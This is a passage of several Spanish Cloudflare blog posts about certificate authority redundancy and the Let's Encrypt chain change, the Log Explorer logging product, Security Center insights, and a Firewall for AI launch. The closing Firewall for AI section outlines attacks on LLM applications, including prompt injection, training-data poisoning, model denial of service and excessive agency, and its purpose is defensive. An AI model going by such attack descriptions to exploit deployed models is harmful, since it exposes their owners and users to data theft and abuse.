Nos aseguramos de que cada emisión y renovación de certificado requiera el mínimo esfuerzo por parte de nuestros clientes. Para obtener un certificado, el propietario de un dominio tiene que completar la DCV para demostrar que realmente es el propietario del dominio. Una vez iniciada la solicitud del certificado, la CA devolverá el token DCV que el propietario del dominio deberá colocar en un registro DNS o un token HTTP. Si utilizas Cloudflare como tu proveedor de DNS, Cloudflare completa la DCV en tu nombre colocando automáticamente el token TXT devuelto por la CA en tu registro DNS. Como alternativa, si utilizas un proveedor de DNS externo, ofrecemos la opción de delegar la DCV a Cloudflare para realizar renovaciones automáticas sin la intervención del cliente.

Una vez colocados, las CA verifican los tokens DCV. Las CA llevan a cabo esta verificación desde varios ámbitos para evitar intentos de suplantación. Sin embargo, dado que estas comprobaciones se realizan desde varios países y ASN (sistemas autónomos), pueden activar una regla en el Cloudflare WAF que puede bloquear la comprobación de la DCV. Nos aseguramos de actualizar nuestro WAF y nuestro motor de seguridad para reconocer que estas solicitudes proceden de una CA y garantizar así que nunca se bloqueen y que la DCV se pueda completar con éxito.

Algunos clientes tienen preferencias de CA, debido a requisitos internos o a normativas de cumplimiento. Para evitar que una CA no autorizada emita un certificado para un dominio, el propietario del dominio puede crear un registro DNS de autorización de la autoridad de certificación (CAA), especificando qué CA pueden emitir un certificado para ese dominio. Para garantizar que los clientes siempre puedan obtener un certificado, comprobamos los registros de CAA antes de solicitar un certificado para saber qué CA debemos utilizar. Si los registros CAA bloquean todas las CA que están disponibles en la canalización de Cloudflare y el cliente no ha cargado un certificado de la CA de su elección, añadimos registros CAA en nombre de nuestros clientes para garantizar que puedan obtener un certificado emitido. Siempre que podemos, optimizamos las preferencias. De lo contrario, nuestro trabajo es evitar una interrupción asegurándonos de que siempre haya un certificado TLS disponible para el dominio, incluso si no procede de una CA preferida.

En la actualidad, Cloudflare no es una autoridad de certificación de confianza pública, por lo que dependemos de las CA que utilizamos para tener una alta disponibilidad. Sin embargo, un tiempo activo del 100 % es una expectativa poco realista. En cambio, nuestra canalización debe estar preparada en caso de que nuestras CA dejen de estar disponibles.

En Cloudflare, nos gusta pensar en el futuro, lo que significa prevenir los incidentes antes de que ocurran. No es raro que las CA dejen de estar disponibles. A veces ocurre debido a una interrupción, pero lo más común es que ocurra temporalmente durante los periodos de mantenimiento de las CA.

Nuestro trabajo es garantizar la redundancia de las CA, por lo que siempre tenemos varias preparadas para emitir un certificado, lo que garantiza una alta disponibilidad en todo momento. Si has observado que diferentes CA emiten tus certificados Universal SSL, es de forma intencionada. Distribuimos uniformemente la carga entre nuestras CA para evitar cualquier punto único de fallo. Además, monitorizamos la latencia y la tasa de error para detectar cualquier problema y cambiar automáticamente a una CA diferente que esté disponible y funcione. Puede que no lo sepas, pero una de nuestras CA se somete a 4 periodos de mantenimiento programados cada mes. Cuando esto sucede, nuestros sistemas automatizados se activan de forma eficaz, para que todo funcione sin problemas. Todo el proceso se desarrolla tan bien que ya no tenemos que localizar a nuestros equipos internos porque todo funciona, sin más.

La seguridad siempre ha sido, y seguirá siendo, la principal prioridad de Cloudflare, por lo que es fundamental mantener los más altos estándares de seguridad para proteger los datos de nuestros clientes y las claves privadas.

Durante la última década, el CA/Browser Forum ha abogado por reducir la vida útil de los certificados de 5 años a 90 días como norma del sector. Este cambio ayuda a minimizar la amenaza de una clave en riesgo. Cuando los certificados se renuevan cada 90 días, sus claves privadas siguen siendo válidas solo durante ese periodo, lo que reduce la ventana de tiempo en que un ciberdelincuente puede hacer uso del material en riesgo.

Apoyamos plenamente este cambio y hemos establecido 90 días como periodo de validez del certificado por defecto. Este cambio mejora nuestra postura de seguridad porque garantiza renovaciones regulares de las claves, y nos ha empujado a desarrollar herramientas como DCV Delegation que promueven la automatización en torno a las renovaciones frecuentes de certificados, sin la sobrecarga adicional. Esta función es lo que nos permite ofrecer certificados con periodos de validez de tan solo dos semanas, para los clientes que quieren renovar sus claves privadas con mucha frecuencia sin preocuparse de que esto provoque fallos en la renovación del certificado.

Cloudflare siempre ha estado a la vanguardia de los nuevos protocolos y estándares. No es ningún secreto que cuando apoyamos un nuevo protocolo, la adopción se dispara. Este mes añadiremos la compatibilidad ECDSA para certificados emitidos desde Google Trust Services. Con ECDSA, obtienes el mismo nivel de seguridad que RSA, pero con claves más pequeñas. Las claves más pequeñas implican certificados más pequeños y menos datos que se pasan para establecer una conexión TLS , lo que se traduce en conexiones y tiempos de carga más rápidos.

En la actualidad, Cloudflare emite casi un millón de certificados al día. Con el reciente cambio hacia una vida útil más corta de los certificados, seguimos mejorando nuestra canalización para que sea más sólida. Pero incluso si nuestra canalización puede gestionar la carga significativa, aún necesitamos confiar en nuestras CA para poder escalar con nosotros. Con cada CA que integramos, nos convertimos instantáneamente en uno de sus mayores usuarios. Exigimos a nuestras autoridades de certificación un alto nivel y las impulsamos a mejorar su infraestructura para escalar. Esto no solo beneficia a los clientes de Cloudflare, sino que ayuda a Internet, ya que exige a las CA que gestionen mayores volúmenes de emisión.

Y ahora que Let's Encrypt reduce su cadena de confianza, vamos a añadir una mejora adicional a nuestra canalización, una que garantice la mejor compatibilidad de dispositivos para todos.

El próximo cambio de Let's Encrypt evitará que los dispositivos heredados realicen solicitudes a dominios o aplicaciones que estén protegidos por un certificado de Let's Encrypt. No queremos interrumpir el acceso a Internet desde ninguna parte del mundo, lo que significa que vamos a seguir ofreciendo la mejor compatibilidad de dispositivos a nuestros clientes, a pesar del cambio.

Gracias a todas las mejoras recientes, podemos reducir nuestra dependencia de Let's Encrypt sin afectar la fiabilidad o la calidad de servicio de nuestra canalización de certificados. Con un ciclo de vida de los certificados (90 días) antes del cambio, vamos a empezar a cambiar los certificados para utilizar una CA diferente, una que sea compatible con los dispositivos que se verán afectados. De este modo, mitigaremos cualquier impacto sin necesidad de que nuestros clientes tengan que intervenir. Los únicos clientes que seguirán utilizando Let's Encrypt son aquellos que hayan elegido específicamente Let's Encrypt como CA.

La cadena con firma cruzada de Let's Encrypt expirará el 30 de septiembre de 2024. Aunque Let's Encrypt planea dejar de emitir certificados de esta cadena el 6 de junio de 2024, Cloudflare seguirá sirviendo la cadena con firma cruzada para todos los certificados de Let's Encrypt hasta el 9 de septiembre de 2024.

Con 90 días o un ciclo de vida de certificado antes del cambio, vamos a empezar a cambiar los certificados de Let's Encrypt para que utilicen una autoridad de certificación diferente. Implementaremos el cambio en todos los productos en los que Cloudflare sea responsable de la selección de la CA, lo que significa que será automático para los clientes que utilicen Universal SSL y SSL for SaaS con la opción "CA por defecto".

Cualquier cliente que haya elegido específicamente Let's Encrypt como su CA recibirá una notificación por correo electrónico con una lista de sus certificados de Let's Encrypt e información sobre si estamos viendo o no solicitudes en esos nombres de host procedentes de dispositivos heredados.

A partir del 9 de septiembre de 2024, Cloudflare servirá todos los certificados de Let's Encrypt utilizando la cadena ISRG Root X1. Esto es lo que deberías esperar en función del producto de certificado que estés utilizando:

Con Universal SSL, Cloudflare elige la CA que se utiliza para el certificado del dominio. De esta manera, podemos elegir el mejor certificado para nuestros clientes. Si utilizas Universal SSL, no tendrás que hacer nada antes del cambio. Cloudflare cambiará automáticamente tu certificado para que utilice una CA más compatible.

Con Advanced Certificate Manager, los clientes eligen específicamente qué CA quieren utilizar. Si eligieron Let's Encrypt como la CA para un certificado, respetaremos la elección, porque los clientes pueden haber elegido esta CA en concreto debido a requisitos internos, o porque han implementado el anclaje de certificados, lo que desaconsejamos encarecidamente.

Si prevemos que un dominio que utiliza un certificado avanzado emitido por Let's Encrypt se verá afectado por el cambio, enviaremos notificaciones por correo electrónico para informar a esos clientes sobre que certificados utilizan Let's Encrypt como su CA y si esos dominios están recibiendo o no solicitudes del cliente que se verá afectado por el cambio. Los clientes serán responsables de cambiar la CA a otro proveedor, si así lo deciden.

Con SSL for SaaS, los clientes tienen dos opciones: utilizar una CA por defecto, lo que significa que Cloudflare elegirá la autoridad emisora, o especificar qué CA utilizar.

Si dejas la elección de la CA en manos de Cloudflare, utilizaremos automáticamente una CA con mayor compatibilidad de dispositivos.

Si especificas una determinada autoridad de certificación para tus nombres de host personalizados, respetaremos esa elección. Enviaremos un correo electrónico a los proveedores y plataformas de SaaS para informarles de qué nombres de host personalizados están recibiendo solicitudes de dispositivos heredados. Los clientes serán responsables de cambiar la CA a otro proveedor, si así lo deciden.

Si haces una integración directa con Let's Encrypt y utilizas certificados personalizados para cargar tus certificados de Let's Encrypt en Cloudflare, tus certificados se incluirán en la cadena con firma cruzada, siempre que elijas el método de paquete "compatible" o "moderno" y los cargues antes del 9 de septiembre de 2024. Después del 9 de septiembre, agruparemos todos los certificados de Let's Encrypt con la cadena ISRG Root X1. Con el método de paquete "definido por el usuario", siempre servimos la cadena que se carga en Cloudflare. Si cargas certificados de Let's Encrypt con este método, tendrás que asegurarte de que los certificados cargados después del 30 de septiembre de 2024, la fecha de caducidad de la CA, contienen la cadena de certificados correcta.

Además, si controlas los clientes que se conectan a tu aplicación, te recomendamos que actualices el almacén de confianza para incluir ISRG Root X1. Si utilizas el anclaje de certificados, elimina o actualiza tu anclaje. En general, desaconsejamos a todos los clientes que anclen sus certificados, ya que esto suele causar problemas durante las renovaciones de certificados o los cambios de CA.

Los estándares de Internet seguirán evolucionando y mejorando. Conforme apoyamos y adoptamos esos cambios, también debemos reconocer que es nuestra responsabilidad mantener a los usuarios en línea y el acceso a Internet en las partes del mundo donde las nuevas tecnologías no están disponibles. Con Cloudflare, siempre tienes la opción de elegir la configuración que mejor se adapte a tu aplicación.

Para obtener más información sobre este cambio, consulta nuestra documentación para desarrolladores.

Security Analytics te permite analizar todo tu tráfico HTTP en un solo lugar, proporcionándote la óptica de seguridad que necesitas para identificar lo más importante y tomar medidas para resolverlo: el tráfico potencialmente malicioso que no ha sido mitigado. Security Analytics incluye vistas integradas (como las estadísticas principales) y filtros rápidos en contexto, en un diseño de página intuitivo que permite una exploración y validación rápidas.

Para impulsar nuestros completos paneles de control de análisis con un rendimiento de consulta rápido, hemos implementado el muestreo de datos utilizando análisis de velocidad adaptativa de bits (ABR). Esto resulta muy adecuado para proporcionar vistas agregadas de alto nivel de los datos. Sin embargo, muchos usuarios avanzados de Security Analytics nos han comentado que a veces necesitan acceder a una vista más granular de los datos: necesitan los registros.

Los registros proporcionan una visibilidad esencial de las operaciones de los sistemas informáticos actuales. Los ingenieros y los analistas de los centros de operaciones de seguridad (SOC) utilizan los registros a diario para solucionar problemas, identificar e investigar incidentes de seguridad y ajustar el rendimiento, la fiabilidad y la seguridad de sus aplicaciones y su infraestructura. Las soluciones de supervisión o las métricas tradicionales ofrecen datos agregados o estadísticos que pueden utilizarse para identificar tendencias. Las métricas son muy útiles para identificar QUÉ ha ocurrido, pero carecen de eventos detallados que ayuden a los ingenieros a descubrir POR QUÉ ha ocurrido. Los ingenieros y los analistas de los SOC dependen de los datos de registro sin procesar para responder a distintas preguntas:

• ¿Cuál es la causa de este aumento de los errores 403?

• ¿A qué datos ha accedido esta dirección IP?

• ¿Cuál ha sido la experiencia de este usuario específico con su sesión?

Tradicionalmente, estos ingenieros y analistas reunían un conjunto de diversas herramientas de supervisión para capturar los registros y obtener esta visibilidad. Puesto que cada vez más organizaciones utilizan varias nubes, o un entorno híbrido con herramientas y arquitectura tanto en la nube como locales, es fundamental disponer de una plataforma unificada para recuperar la visibilidad de este entorno cada vez más complejo.  Cuando cada vez más empresas adoptan una arquitectura nativa de nube, consideramos la conectividad cloud de Cloudflare como una parte integral de su estrategia de rendimiento y seguridad.

Log Explorer ofrece una opción más económica para el almacenamiento y la exploración de tus datos de registro en Cloudflare. Hasta hoy, hemos ofrecido la posibilidad de exportar los registros a costosas herramientas de terceros. Ahora, con Log Explorer, puedes explorar rápida y fácilmente tus datos de registro sin salir del panel de control de Cloudflare.

Ya seas un ingeniero del SOC que investiga posibles incidentes, o un responsable del cumplimiento con requisitos específicos de retención de registros, Log Explorer es la opción ideal para ti. Almacena tus registros de Cloudflare durante un periodo de tiempo ilimitado y personalizable, de forma que están accesibles de forma nativa desde el panel de control de Cloudflare. Admite estas funciones:

• Buscar en tus registros de eventos de seguridad o solicitudes HTTP

• Filtrar por cualquier campo y una serie de operadores estándar

• Cambiar entre el modo de filtro básico o la interfaz de consulta SQL

• Seleccionar los campos para mostrar

• Ver los eventos de registro en formato tabular

• Buscar los registros de solicitudes HTTP asociados a un Id. de rayo

Como analista del SOC, tu trabajo consiste en supervisar y responder a las amenazas y a los incidentes en la red de tu organización. Con Security Analytics, y ahora con Log Explorer, puedes identificar las anomalías y realizar una investigación forense, todo en un mismo lugar.

Veamos un ejemplo para mostrar esto en la práctica:

En el panel de control de Security Analytics, puedes ver en el panel Insights que hay tráfico que se ha etiquetado como probablemente correspondiente a un ataque, pero que no se ha mitigado.

Con un clic en el botón de filtro puedes reducir el número de solicitudes para acotar tu investigación.

En la vista de registros muestreados, puedes observar que la mayoría de estas solicitudes proceden de una dirección IP de cliente común.

También puedes ver que Cloudflare ha marcado todas estas solicitudes como tráfico de bots. Con esta información, puedes elaborar una regla WAF para bloquear todo el tráfico procedente de esta dirección IP, o bien para bloquear todo el tráfico que tenga una puntuación de bot inferior a 10.

Supongamos que el equipo responsable del cumplimiento quiere reunir documentación sobre el alcance y la repercusión de este ataque. Podemos detallar más en los registros durante este periodo de tiempo para ver todo a lo que este atacante ha intentado acceder.

En primer lugar, podemos utilizar Log Explorer para consultar las solicitudes HTTP procedentes de la dirección IP sospechosa durante el intervalo de tiempo del pico observado en Security Analytics.

También podemos revisar si el atacante ha podido exfiltrar datos. Para ello, añadimos el campo OriginResponseBytes y actualizamos la consulta para que muestre las solicitudes con OriginResponseBytes > 0. Los resultados muestran que no se han exfiltrado datos.

Con el acceso a los registros completos mediante Log Explorer, ahora puedes realizar una búsqueda de solicitudes específicas.

Un error 403 se produce cuando se bloquea la solicitud de un usuario a un sitio determinado. Los productos de seguridad de Cloudflare utilizan elementos como la reputación de IP y WAF Attack Score basados en tecnologías de aprendizaje automático con el fin de evaluar si una determinada solicitud HTTP es maliciosa. Esto es extremadamente eficaz, pero a veces las solicitudes se marcan erróneamente como maliciosas y se bloquean.

En estas situaciones, ahora podemos utilizar Log Explorer para identificar estas solicitudes y por qué se han bloqueado, y a continuación ajustar las reglas WAF pertinentes en consecuencia.

O bien, si te interesa rastrear una solicitud concreta por Id. de rayo (RayID, un identificador que se asigna a cada solicitud que pasa por Cloudflare) puedes hacerlo mediante Log Explorer con una sola consulta.

Ten en cuenta que la cláusula LIMIT se incluye por defecto en la consulta, pero no afecta a las consultas RayID, ya que RayID es único y sólo se devolvería un registro al utilizar el campo de filtro RayID.

Con Log Explorer, hemos desarrollado una plataforma de almacenamiento de registros a largo plazo de tipo append-only sobre Cloudflare R2. Log Explorer utiliza el protocolo Delta Lake, un marco de almacenamiento de código abierto para desarrollar bases de datos de alto rendimiento conpatibles con ACID sobre un almacén de objetos en la nube. En otras palabras, Log Explorer combina un sistema de almacenamiento grande y rentable, Cloudflare R2, con las ventajas de su sólida coherencia y su alto rendimiento. Además, Log Explorer te proporciona una interfaz SQL para tus registros de Cloudflare.

Cada conjunto de datos de Log Explorer se almacena a nivel de cada cliente, igual que Cloudflare D1, de forma que tus datos no se mezclan con los de otros clientes. En el futuro, este modelo de almacenamiento de cliente único te permitirá crear tus propias políticas de retención y decidir en qué regiones quieres almacenar tus datos.

A nivel interno, los conjuntos de datos de cada cliente se almacenan como tablas Delta en buckets R2. Una tabla Delta es un formato de almacenamiento que organiza objetos Apache Parquet en directorios utilizando la convención de nomenclatura de las particiones de Hive. Fundamentalmente, las tablas Delta emparejan estos objetos de almacenamiento con un registro de transacciones de tipo append-only que incluye puntos de verificación. Este diseño permite que Log Explorer admita múltiples escritores con concurrencia optimista.

Muchos de los productos que desarrolla Cloudflare son un resultado directo de los desafíos que nuestro propio equipo trata de abordar. Log Explorer es un ejemplo perfecto de esta cultura de dogfooding. Las escrituras concurrentes optimistas requieren actualizaciones atómicas en el almacén de objetos subyacente, y considerando nuestras necesidades, R2 ha añadido una operación PutIfAbsent con fuerte coherencia. ¡Gracias, R2! La operación atómica diferencia a Log Explorer de las soluciones Delta Lake basadas en S3 de Amazon Web Services, que incurren en la carga operativa de utilizar un almacén externo para sincronizar las escrituras.

Log Explorer está escrito en el lenguaje de programación Rust utilizando bibliotecas de código abierto, como delta-rs, una implementación Rust nativa del protocolo Delta Lake, y Apache Arrow DataFusion, un motor de consulta muy rápido y extensible. En Cloudflare, Rust se ha convertido en una opción popular para el desarrollo de nuevos productos, debido a sus ventajas en seguridad y rendimiento.

Sabemos que los registros de seguridad de las aplicaciones son sólo una pieza del rompecabezas que permite comprender lo que sucede en tu entorno. Permanece atento a nuestros futuros desarrollos, como una integración más estrecha y fluida entre Analytics y Log Explorer, la incorporación de más conjuntos de datos, incluidos los registros Zero Trust, la posibilidad de definir periodos de retención personalizados y las alertas personalizadas integradas.

Utiliza el enlace de comentarios para contarnos qué te parece Log Explorer y qué otras cosas te facilitarían tu trabajo.

¡Nos encantaría saber de ti! Si te interesa unirte a nuestro programa Beta, rellena este formulario y un miembro de nuestro equipo se pondrá en contacto contigo.

El precio definitivo se establecerá antes de la disponibilidad general del producto.

Descubre más noticias, anuncios y debates que invitan a la reflexión. Consulta la página de Security Week.

El problema principal que estamos abordando es la creciente complejidad de las ciberamenazas y la superficie de ataque en expansión, que complica el mantenimiento de una postura de seguridad eficaz para nuestros clientes.

No es infrecuente que las organizaciones implementen diversas soluciones de seguridad, incluidas las nuestras, sin optimizar y aplicar plenamente sus configuraciones. El resultado es una falsa sensación de seguridad, inversiones infrautilizadas y, peor aún, la exposición de vulnerabilidades. Nuestros clientes expresan con frecuencia su preocupación por no tener una imagen clara de su postura de seguridad en toda su infraestructura, por no saber si los activos críticos están protegidos adecuadamente o si se podrían aprovechar mejor funciones de seguridad específicas de Cloudflare.

Queremos ofrecer a los usuarios una visibilidad integral de sus configuraciones de seguridad y del estado de sus implementaciones en todo el conjunto de productos de Cloudflare. Al proporcionar información útil sobre las áreas insuficientemente configuradas, los recursos no asignados o las funciones no utilizadas, pretendemos cerrar las brechas de seguridad y mejorar los mecanismos generales de protección de los ecosistemas digitales de nuestros clientes. Esta mejora no consiste sólo en aprovechar la tecnología, sino en promover una cultura de gestión proactiva de la seguridad, en la que cada pieza de la infraestructura digital esté protegida de forma coherente y óptima.

Hace más de dos años, asumimos la misión de consolidar nuestro amplio conjunto de productos de seguridad, nuestra experiencia en seguridad y nuestros conocimientos únicos sobre las amenazas de Internet en una solución integral: el  Centro de seguridad de Cloudflare. Lanzado con la visión de simplificar la gestión de la superficie de ataque y de proporcionar información avanzada sobre seguridad útil para las organizaciones de todos los tamaños, desde entonces el Centro de seguridad se ha convertido en la vista rápida única para evaluar tu postura de seguridad.

Hoy, sobre esta base, abordamos un punto débil de muchos de nuestros grandes clientes: garantizar la protección completa de Cloudflare en toda su infraestructura digital.

Nuestra última actualización del Centro de seguridad se centra en ofrecer información detallada sobre el estado de implementación de Cloudflare en tus activos digitales. Esto incluye identificar las aplicaciones en las que servicios críticos como WAF, Access y otras herramientas de protección de la seguridad podrían no estar totalmente configurados u optimizados, debilitando así tu postura de seguridad.

Además de esta información, presentamos una vista rápida en la información del Centro de seguridad, diseñada para ofrecer a los directores de seguridad de la información y a los equipos de seguridad una visión rápida y completa de las configuraciones actuales de sus productos de Cloudflare en un momento dado, junto con recomendaciones de mejoras, bajo la instantánea Optimización de la seguridad en el panel de control.

Aprovechando esta nueva información, los usuarios de Cloudflare ahora pueden tomar medidas proactivas para cerrar cualquier brecha de su infraestructura de seguridad. Al ofrecer una visión granular de dónde se pueden utilizar mejor los servicios específicos de Cloudflare, no sólo resolvemos un problema de visibilidad, sino que proporcionamos información útil sobre seguridad. Esto significa que pueden tomarse decisiones con rapidez, garantizando que tus defensas no sólo respondan a las amenazas potenciales, sino que se anticipen a ellas.

Por ejemplo, destacaremos si WAF está implementado sólo en algunas tus zonas, dónde podría utilizarse la seguridad del correo electrónico, o si determinados activos no están protegidos por los controles de acceso. También te facilitamos la tarea de ver si te falta alguna configuración crítica, como Page Shield, asegurándonos de que el producto está configurado para que no sólo estés un paso más cerca de cumplir normas como PCI DSS, sino que también estés protegido contra las amenazas en constante evolución. Exponemos los puntos finales de la API recién descubiertos que también requieren tu atención.

Por último, los usuarios ya pueden exportar su información sobre seguridad utilizando nuestra API pública, y pronto podrán hacer lo mismo directamente desde el panel de control de Cloudflare, ¡con solo un clic!

La información del Centro de seguridad está disponible para todos los usuarios del panel de Cloudflare que sean administradores de su cuenta de Cloudflare.

Independientemente del tamaño o del alcance de tu implementación, nuestro objetivo es dotar a cada usuario de las herramientas necesarias para lograr una postura de seguridad eficaz, en la que pueda influir continuamente mejorando las configuraciones existentes, añadiendo nuevas soluciones y descubriendo nuevas vulnerabilidades.

Añadimos continuamente más información relevante sobre seguridad para ayudarte a mejorar tu postura de seguridad. Incluye la infraestructura expuesta, las configuraciones no seguras, las optimizaciones, los nuevos productos y mucho más, así como la posibilidad de exportarla fácilmente para la elaboración de informes. Asimismo, sigue atento para descubrir una plataforma de informes completamente nueva que te entregará automáticamente información sobre seguridad seleccionada y contextualizada directamente en tu bandeja de entrada, demostrando la eficiencia de la cartera de productos de seguridad de Cloudflare. Los informes periódicos se complementarán con una experiencia personalizada e interactiva de elaboración de informes en el panel de control.

Echa un vistazo a tu información sobre seguridad en el Centro de seguridad de tu cuenta y toma medidas para mejorar tu postura de seguridad con Cloudflare.

Si quieres unirte a nosotros para desarrollar el Centro de seguridad u otros interesantes productos de Cloudflare, consulta nuestros puestos vacantes y obtén más información sobre el día a día en Cloudflare.

Aunque los modelos de IA, y específicamente los LLM, están en auge, los clientes nos indican que les preocupa encontrar las mejores estrategias para proteger sus propios LLM. La utilización de los LLM como parte de las aplicaciones conectadas a Internet añade nuevas vulnerabilidades que los ciberdelincuentes pueden aprovechar.

Algunas de las vulnerabilidades que afectan a las aplicaciones web y API tradicionales también son aplicables al mundo de los LLM, como las inyecciones o la exfiltración de datos. Sin embargo, hay un nuevo conjunto de amenazas que ahora son relevantes debido a cómo funcionan los LLM. Por ejemplo, los investigadores han descubierto recientemente una vulnerabilidad en una plataforma de colaboración de IA que les permite secuestrar modelos y realizar acciones no autorizadas.

Firewall for AI es un firewall de aplicaciones web (WAF) avanzado, personalizado específicamente para las aplicaciones que utilizan LLM. Constará de un conjunto de herramientas que se pueden implementar delante de las aplicaciones para detectar vulnerabilidades y ofrecer visibilidad a los propietarios de los modelos. Este conjunto de herramientas incluirá productos que ya forman parte de WAF, como la limitación de velocidad y la detección de datos confidenciales, y una nueva capa de protección que está actualmente en desarrollo. Esta nueva validación analiza la instrucción que envía el usuario final para identificar los intentos de explotar el modelo a fin de extraer datos y otros tipos de abuso. Gracias al gran tamaño de la red de Cloudflare, Firewall for AI se ejecuta lo más cerca posible del usuario. Esto nos permite identificar los ataques en un etapa temprana y proteger tanto al usuario final como a los modelos contra abusos y ataques.

Antes de analizar el funcionamiento de Firewall for AI y su completo conjunto de funciones, analicemos primero qué hace únicos a los LLM, y las superficies de ataque que introducen. Como referencia, utilizaremos las 10 principales vulnerabilidades de OWASP para LLM.

Al considerar los LLM como aplicaciones conectadas a Internet, observamos dos diferencias principales respecto a las aplicaciones web más tradicionales.

En primer lugar, la forma como los usuarios interactúan con el producto. Las aplicaciones tradicionales son deterministas por naturaleza. Considera una aplicación bancaria. Se define en función de un conjunto de operaciones (consultar mi saldo, realizar una transferencia, etc.). Podemos garantizar la seguridad de la operación comercial (y de los datos) controlando el conjunto específico de operaciones que aceptan estos puntos finales: "GET /balance" o "POST /transfer".

Por diseño, las operaciones de los LLM son no deterministas. Para empezar, las interacciones con los LLM se basan en el lenguaje natural, por lo que identificar las solicitudes problemáticas es más difícil que la correspondencia con firmas de ataque. Además, a menos que haya una respuesta almacenada en la caché, los LLM suelen ofrecer una respuesta distinta cada vez, incluso si se repite la misma instrucción de entrada. Por lo tanto, limitar cómo un usuario interactúa con la aplicación es considerablemente más complejo. Esto también plantea una amenaza para el usuario, ya que podría estar expuesto a información errónea que debilite la confianza en el modelo.

En segundo lugar, una diferencia importante es cómo el plano de control de la aplicación interactúa con los datos. En las aplicaciones tradicionales, el plano de control (el código) está claramente separado del plano de datos (la base de datos). Las operaciones definidas son la única forma de interactuar con los datos subyacentes (p. ej. "muéstrame el historial de mis transacciones de pago"). Esto permite a los expertos en seguridad centrarse en añadir comprobaciones y protección al plano de control y así proteger indirectamente la base de datos.

Los LLM difieren en que los datos de entrenamiento pasan a formar parte del propio modelo durante el proceso de entrenamiento, por lo que controlar cómo se comparten esos datos como resultado de la instrucción de un usuario resulta muy difícil. Se han estudiado algunas soluciones a nivel de arquitectura, como separar los LLM en distintos niveles y segregar los datos. Sin embargo, aún no se ha encontrado la fórmula mágica.

Desde una perspectiva de la seguridad, estas diferencias permiten a los ciberdelincuentes crear nuevos vectores de ataque dirigidos a los LLM y burlar las herramientas de seguridad existentes diseñadas para las aplicaciones web tradicionales.

La fundación OWASP publicó una lista de las 10 principales clases de vulnerabilidades para los LLM, proporcionando un marco útil para explorar cómo proteger los modelos de lenguaje. Algunas de las amenazas recuerdan a las 10 principales vulnerabilidades de OWASP para aplicaciones web, mientras que otras son específicas de los modelos de lenguaje.

Al igual que con las aplicaciones web, algunas de estas vulnerabilidades se pueden abordar mejor cuando la aplicación de LLM se ha diseñado, desarrollado y entrenado. Por ejemplo, el envenenamiento de datos de entrenamiento se puede llevar a cabo introduciendo vulnerabilidades en el conjunto de datos de entrenamiento utilizados para entrenar nuevos modelos. A continuación, la información envenenada se presenta al usuario cuando el modelo está activo. Las vulnerabilidades de la cadena de suministro y el diseño de complemento no seguro son vulnerabilidades introducidas en componentes añadidos al modelo, como paquetes de software de terceros. Por último, la gestión de la autorización y de los permisos es fundamental para abordar la autonomía excesiva, donde modelos no restringidos pueden realizar acciones no autorizadas en la aplicación o la infraestructura a nivel más general.

Por el contrario, la inyección de instrucciones, la denegación de servicio del modelo y la divulgación de información confidencial se pueden mitigar mediante la adopción de una solución de seguridad de proxy como Cloudflare Firewall for AI. En las secciones siguientes comentaremos en más detalle estas vulnerabilidades y cómo Cloudflare se encuentra en una posición privilegiada para mitigarlas.

Los riesgos de los modelos de lenguaje dependen también del modelo de implementación. Actualmente hay las tres principales estrategias de implementación: LLM internos, LLM públicos y LLM de productos. En los tres escenarios, debemos proteger los modelos contra los abusos, proteger los datos privados almacenados en el modelo y proteger al usuario final frente a información errónea o la exposición a contenido inadecuado.

• LLM internos: las empresas desarrollan LLM para ayudar a sus empleados con sus tareas cotidianas. Estos LLM se consideran activos corporativos y no deberían ser accesibles a personas ajenas a la empresa. Por ejemplo, un copiloto de IA entrenado con datos de ventas e interacciones con los clientes utilizado para generar propuestas personalizadas, o un LLM entrenado con una base de conocimiento interna que los ingenieros pueden consultar.

• LLM públicos: son LLM a los que se puede acceder desde fuera de la empresa. Estas soluciones suelen tener versiones gratuitas que todo el mundo puede utilizar, y a menudo se entrenan con conocimientos generales o públicos. Pore ejemplo, GPT de OpenAI o Claude de Anthropic.

• LLM de productos: desde la perspectiva de una empresa, los LLM pueden formar parte de un producto o servicio ofrecido a sus clientes. Estos LLM suelen ser soluciones personalizadas y autoalojadas que pueden estar disponibles como una herramienta para interactuar con los recursos de la empresa. Por ejemplo, los chabots de asistencia o Cloudflare AI Assistant.

Desde la perspectiva de los riesgos, la diferencia entre los LLM públicos y los LLM privados es quién resulta afectado cuando los ataques tienen éxito. Los LLM públicos se consideran una amenaza para los datos porque prácticamente cualquiera puede acceder a los datos que acaban formando parte del modelo. Esta es una de las razones por las que muchas empresas aconsejan a sus empleados que no incluyan información confidencial en las instrucciones de servicios disponibles públicamente. Los LLM de productos se consideran una amenaza para las empresas y su propiedad intelectual si los modelos han accedido a información privada durante el entrenamiento (ya sea por diseño o  inadvertidamente).

Cloudflare Firewall for AI se implementará como un WAF tradicional, donde se analiza cada solicitud de API con una instrucción de LLM en busca de patrones y firmas de posibles ataques.

Firewall for AI se puede implementar delante de modelos alojados en la plataforma de Cloudflare Workers AI o de modelos alojados en cualquier otra infraestructura de terceros. Se puede utilizar junto con Cloudflare AI Gateway, y los clientes podrán controlar y configurar Firewall for AI mediante el plano de control de WAF.

Firewall for AI funciona como un firewall de aplicaciones web tradicional. Se implementa delante de una aplicación de LLM y se analiza cada solicitud para identificar firmas de ataque.

Una de las amenazas que incluye OWASP es la denegación de servicio del modelo. Al igual que con las aplicaciones tradicionales, se lanza un ataque DoS, consumiendo una cantidad excepcionalmente alta de recursos, lo que daña la calidad del servicio o puede aumentar los costes de ejecución del modelo. Debido a la gran cantidad de recursos que requiere la ejecución de los LLM, y a la imprevisibilidad de la entrada de los usuarios, este tipo de ataque puede ser dañino.

Es posible mitigar este riesgo mediante la adopción de políticas de limitación de velocidad que controlen la velocidad de las solicitudes de sesiones individuales, limitando por lo tanto la ventana de contexto. Hoy, redireccionando tu modelo a través de Cloudflare, te beneficias de protección contra DDoS lista para usar. También puedes utilizar la limitación de velocidad y la limitación de velocidad avanzada para gestionar la velocidad de las solicitudes que permites que lleguen a tu modelo, estableciendo una velocidad máxima de las solicitudes que puede enviar una dirección IP o una clave de API individual durante una sesión.

Hay dos casos de uso para los datos confidenciales, en función de si eres propietario del modelo y de los datos, o de si deseas evitar que los usuarios envíen datos a los LLM públicos.

